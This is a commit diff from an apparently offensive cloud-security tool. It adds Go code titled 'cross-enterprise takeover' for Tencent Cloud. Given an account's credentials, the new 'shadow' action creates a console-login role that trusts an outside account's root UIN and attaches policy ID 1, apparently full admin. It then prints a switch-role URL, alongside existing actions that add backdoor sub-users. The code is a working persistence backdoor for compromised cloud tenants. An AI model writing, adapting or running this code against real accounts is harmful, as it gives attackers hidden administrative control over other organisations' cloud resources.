feat(tencent):CreateRole implements cross-enterprise takeover

404tk · 404tk · commit c2e662a55bd9 · 2023-05-25T00:02:05.000+08:00
diff --git a/pkg/providers/tencent/cam/roleadd.go b/pkg/providers/tencent/cam/roleadd.go
@@ -0,0 +1,43 @@
+package cam
+
+import (
+	"fmt"
+	"log"
+
+	cam "github.com/tencentcloud/tencentcloud-sdk-go/tencentcloud/cam/v20190116"
+	"github.com/tencentcloud/tencentcloud-sdk-go/tencentcloud/common"
+	"github.com/tencentcloud/tencentcloud-sdk-go/tencentcloud/common/profile"
+)
+
+func (d *CamUserProvider) AddRole() {
+	cpf := profile.NewClientProfile()
+	client, _ := cam.NewClient(d.Credential, "", cpf)
+	err := createRole(client, d.RoleName, d.Uin)
+	if err != nil {
+		log.Println("[-] Create role failed:", err.Error())
+		return
+	}
+	err = attachPolicyToRole(client, d.RoleName)
+	OwnerID := getOwnerUin(client)
+	log.Printf("[+] Switch URL: https://cloud.tencent.com/cam/switchrole?ownerUin=%s&roleName=%s\n", OwnerID, d.RoleName)
+}
+
+func createRole(client *cam.Client, roleName, uin string) error {
+	request := cam.NewCreateRoleRequest()
+	request.RoleName = common.StringPtr(roleName)
+	request.ConsoleLogin = common.Uint64Ptr(1)
+	request.SessionDuration = common.Uint64Ptr(10000)
+	policy := fmt.Sprintf(
+		`{"version":"2.0","statement":[{"action":"name/sts:AssumeRole","effect":"allow","principal":{"qcs":["qcs::cam::uin/%s:root"]}}]}`, uin)
+	request.PolicyDocument = common.StringPtr(policy)
+	_, err := client.CreateRole(request)
+	return err
+}
+
+func attachPolicyToRole(client *cam.Client, roleName string) error {
+	request := cam.NewAttachRolePolicyRequest()
+	request.PolicyId = common.Uint64Ptr(1)
+	request.AttachRoleName = common.StringPtr(roleName)
+	_, err := client.AttachRolePolicy(request)
+	return err
+}
diff --git a/pkg/providers/tencent/cam/roledel.go b/pkg/providers/tencent/cam/roledel.go
@@ -0,0 +1,40 @@
+package cam
+
+import (
+	"log"
+
+	cam "github.com/tencentcloud/tencentcloud-sdk-go/tencentcloud/cam/v20190116"
+	"github.com/tencentcloud/tencentcloud-sdk-go/tencentcloud/common"
+	"github.com/tencentcloud/tencentcloud-sdk-go/tencentcloud/common/profile"
+)
+
+func (d *CamUserProvider) DelRole() {
+	cpf := profile.NewClientProfile()
+	client, _ := cam.NewClient(d.Credential, "", cpf)
+	err := detachPolicyFromRole(client, d.RoleName)
+	if err != nil {
+		log.Printf("[-] Remove policy from %s failed: %s\n", d.RoleName, err.Error())
+		return
+	}
+	err = deleteRole(client, d.RoleName)
+	if err != nil {
+		log.Printf("[-] Delete role %s failed: %s\n", d.RoleName, err.Error())
+		return
+	}
+	log.Println("[+] Done.")
+}
+
+func detachPolicyFromRole(client *cam.Client, roleName string) error {
+	request := cam.NewDetachRolePolicyRequest()
+	request.PolicyId = common.Uint64Ptr(1)
+	request.DetachRoleName = common.StringPtr(roleName)
+	_, err := client.DetachRolePolicy(request)
+	return err
+}
+
+func deleteRole(client *cam.Client, roleName string) error {
+	request := cam.NewDeleteRoleRequest()
+	request.RoleName = common.StringPtr(roleName)
+	_, err := client.DeleteRole(request)
+	return err
+}
diff --git a/pkg/providers/tencent/cam/useradd.go b/pkg/providers/tencent/cam/useradd.go
@@ -26,7 +26,7 @@ func (d *CamUserProvider) AddUser() {
 		d.Password, "https://cloud.tencent.com/login/subAccount/"+OwnerID)
 }
 
-func createUser(client *cam.Client, userName string, password string) error {
+func createUser(client *cam.Client, userName, password string) error {
 	request := cam.NewAddUserRequest()
 	request.Name = common.StringPtr(userName)
 	request.ConsoleLogin = common.Uint64Ptr(1)
@@ -43,7 +43,7 @@ func attachPolicyToUser(client *cam.Client, userName string) error {
 	}
 	request := cam.NewAttachUserPolicyRequest()
 	request.PolicyId = common.Uint64Ptr(1)
-	request.AttachUin = common.Uint64Ptr(*resp.Response.Uin)
+	request.AttachUin = resp.Response.Uin
 	_, err = client.AttachUserPolicy(request)
 	return err
 }
diff --git a/pkg/providers/tencent/cam/userdel.go b/pkg/providers/tencent/cam/userdel.go
@@ -21,6 +21,7 @@ func (d *CamUserProvider) DelUser() {
 		log.Printf("[-] Delete user %s failed: %s\n", d.UserName, err.Error())
 		return
 	}
+	log.Println("[+] Done.")
 }
 
 func detachPolicyFromUser(client *cam.Client, userName string) error {
@@ -30,7 +31,7 @@ func detachPolicyFromUser(client *cam.Client, userName string) error {
 	}
 	request := cam.NewDetachUserPolicyRequest()
 	request.PolicyId = common.Uint64Ptr(1)
-	request.DetachUin = common.Uint64Ptr(*resp.Response.Uin)
+	request.DetachUin = resp.Response.Uin
 	_, err = client.DetachUserPolicy(request)
 	return err
 }
diff --git a/pkg/providers/tencent/cam/users.go b/pkg/providers/tencent/cam/users.go
@@ -15,6 +15,8 @@ type CamUserProvider struct {
 	Credential *common.Credential
 	UserName   string
 	Password   string
+	RoleName   string
+	Uin        string
 }
 
 func (d *CamUserProvider) GetCamUser(ctx context.Context) ([]*schema.User, error) {
diff --git a/pkg/providers/tencent/tencent.go b/pkg/providers/tencent/tencent.go
@@ -97,14 +97,23 @@ func (p *Provider) Resources(ctx context.Context) (*schema.Resources, error) {
 	return list, err
 }
 
-func (p *Provider) UserManagement(action, uname, pwd string) {
-	ramprovider := &cam.CamUserProvider{
-		Credential: p.credential, UserName: uname, Password: pwd}
+func (p *Provider) UserManagement(action, args_1, args_2 string) {
+	camprovider := &cam.CamUserProvider{Credential: p.credential}
 	switch action {
 	case "add":
-		ramprovider.AddUser()
+		camprovider.UserName = args_1
+		camprovider.Password = args_2
+		camprovider.AddUser()
 	case "del":
-		ramprovider.DelUser()
+		camprovider.UserName = args_1
+		camprovider.DelUser()
+	case "shadow":
+		camprovider.RoleName = args_1
+		camprovider.Uin = args_2
+		camprovider.AddRole()
+	case "delrole":
+		camprovider.RoleName = args_1
+		camprovider.DelRole()
 	default:
 		log.Println("[-] Please set metadata like \"add username password\" or \"del username\"")
 	}

Original file line number	Diff line number	Diff line change
`@@ -26,7 +26,7 @@ func (d *CamUserProvider) AddUser() {`
`26`	`26`	`d.Password, "https://cloud.tencent.com/login/subAccount/"+OwnerID)`
`27`	`27`	`}`
`28`	`28`
`29`		`-func createUser(client *cam.Client, userName string, password string) error {`
	`29`	`+func createUser(client *cam.Client, userName, password string) error {`
`30`	`30`	`request := cam.NewAddUserRequest()`
`31`	`31`	`request.Name = common.StringPtr(userName)`
`32`	`32`	`request.ConsoleLogin = common.Uint64Ptr(1)`
`@@ -43,7 +43,7 @@ func attachPolicyToUser(client *cam.Client, userName string) error {`
`43`	`43`	`}`
`44`	`44`	`request := cam.NewAttachUserPolicyRequest()`
`45`	`45`	`request.PolicyId = common.Uint64Ptr(1)`
`46`		`- request.AttachUin = common.Uint64Ptr(*resp.Response.Uin)`
	`46`	`+ request.AttachUin = resp.Response.Uin`
`47`	`47`	`_, err = client.AttachUserPolicy(request)`
`48`	`48`	`return err`
`49`	`49`	`}`
Original file line number	Diff line number	Diff line change
`@@ -21,6 +21,7 @@ func (d *CamUserProvider) DelUser() {`
`21`	`21`	`log.Printf("[-] Delete user %s failed: %s\n", d.UserName, err.Error())`
`22`	`22`	`return`
`23`	`23`	`}`
	`24`	`+ log.Println("[+] Done.")`
`24`	`25`	`}`
`25`	`26`
`26`	`27`	`func detachPolicyFromUser(client *cam.Client, userName string) error {`
`@@ -30,7 +31,7 @@ func detachPolicyFromUser(client *cam.Client, userName string) error {`
`30`	`31`	`}`
`31`	`32`	`request := cam.NewDetachUserPolicyRequest()`
`32`	`33`	`request.PolicyId = common.Uint64Ptr(1)`
`33`		`- request.DetachUin = common.Uint64Ptr(*resp.Response.Uin)`
	`34`	`+ request.DetachUin = resp.Response.Uin`
`34`	`35`	`_, err = client.DetachUserPolicy(request)`
`35`	`36`	`return err`
`36`	`37`	`}`
Original file line number	Diff line number	Diff line change
`@@ -15,6 +15,8 @@ type CamUserProvider struct {`
`15`	`15`	`Credential *common.Credential`
`16`	`16`	`UserName string`
`17`	`17`	`Password string`
	`18`	`+ RoleName string`
	`19`	`+ Uin string`
`18`	`20`	`}`
`19`	`21`
`20`	`22`	`func (d CamUserProvider) GetCamUser(ctx context.Context) ([]schema.User, error) {`